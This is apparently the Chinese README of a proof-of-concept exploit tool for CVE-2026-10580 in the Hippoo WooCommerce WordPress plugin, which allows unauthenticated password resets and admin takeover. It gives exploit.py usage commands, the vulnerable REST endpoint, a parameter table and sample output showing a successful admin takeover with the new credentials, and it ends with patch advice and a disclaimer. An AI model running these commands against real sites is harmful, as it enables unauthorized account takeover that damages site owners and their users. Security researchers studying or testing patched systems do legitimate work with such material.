本工具是 CVE-2026-10580 的概念验证漏洞利用程序,该漏洞影响 Hippoo Mobile App for WooCommerce WordPress 插件(版本 <= 1.9.4)。该漏洞允许未经身份验证的攻击者重置任何用户(包括管理员)的密码,从而完全接管站点。
⚠️ 重要提示: 本工具仅用于 授权的安全测试和教育目的。未经授权对您不拥有或未获得明确许可的系统使用是违法的。
requests 库安装依赖:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
使用默认管理员 ID (1) 并启用 SSL 验证进行利用:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
针对特定用户 ID 并禁用 SSL 验证:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
不带横幅运行:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] 发现 3 个用户
- 用户 ID: 1 | 用户名: admin | 角色: administrator
- 用户 ID: 2 | 用户名: editor_user | 角色: editor
- 用户 ID: 3 | 用户名: subscriber1 | 角色: subscriber
╔══════════════════════════════════════════════════════════════╗
║ 管理员账户接管成功 ║
╚══════════════════════════════════════════════════════════════╝
目标: https://example.com
登录: https://example.com/wp-admin
用户名: admin
密码: PwnedCVE2026!!
如果您正在使用 Hippoo 插件,请立即更新到已修补的版本(>1.9.4)。此外:
/wp-json/wc-hippoo/v1/ext/wp/v2/users本项目基于 MIT 许可证 授权。详情请参见 LICENSE 文件。
0xgh057r3c0n
作者不对本工具的任何滥用负责。请负责任地使用,并且仅用于您拥有或获得明确许可测试的系统。
| 参数 | 描述 |
|---|
-t, --target | 目标 WordPress 站点 URL(例如 https://example.com) |
-p, --password | 要为管理员账户设置的新密码 |
-i, --id | 要接管的用户 ID(默认:1) |
-k, --insecure | 跳过 SSL 证书验证 |
--no-banner | 隐藏 ASCII 横幅 |